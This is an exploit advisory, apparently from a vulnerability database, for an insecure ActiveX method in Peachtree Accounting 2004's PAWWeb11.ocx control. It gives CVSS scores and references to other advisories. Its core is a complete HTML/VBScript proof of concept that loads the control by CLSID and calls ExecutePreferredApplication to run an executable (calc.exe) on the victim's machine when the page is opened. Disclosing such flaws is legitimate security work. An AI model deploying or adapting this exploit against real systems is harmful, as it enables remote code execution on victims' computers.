Peachtree Accounting 2004 (PAWWeb11.ocx) ActiveX Insecure Method

2008.10.23
Credit: Jeremy Brown
Risk: High
Local: No
Remote: Yes
CWE: CWE-Other


CVSS Base Score: 9.3/10
Impact Subscore: 10/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

<!-- Jeremy Brown (0xjbrown41@gmail.com/jbrownsec.blogspot.com) Peachtree Accounting Remote (SfS/SfI) Exploit Tested on Peachtree Accounting 2004 / Windows XP / IE6 All Peachtree software that includes PAWWeb11.ocx are assumed vulnerable --> <html><body> <object id=target classid=clsid:2BCEAECE-6121-4E78-816C-8CD3121361B0></object> <script language=vbscript> arg1="C:/WINDOWS/system32/calc.exe" target.ExecutePreferredApplication arg1 </script> </body></html>

References:

http://xforce.iss.net/xforce/xfdb/45009
http://www.securitytracker.com/id?1020842
http://www.securityfocus.com/bid/31096
http://www.milw0rm.com/exploits/6414
http://jbrownsec.blogspot.com/2008/09/peachtree-accounting-is-not-safe.html


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top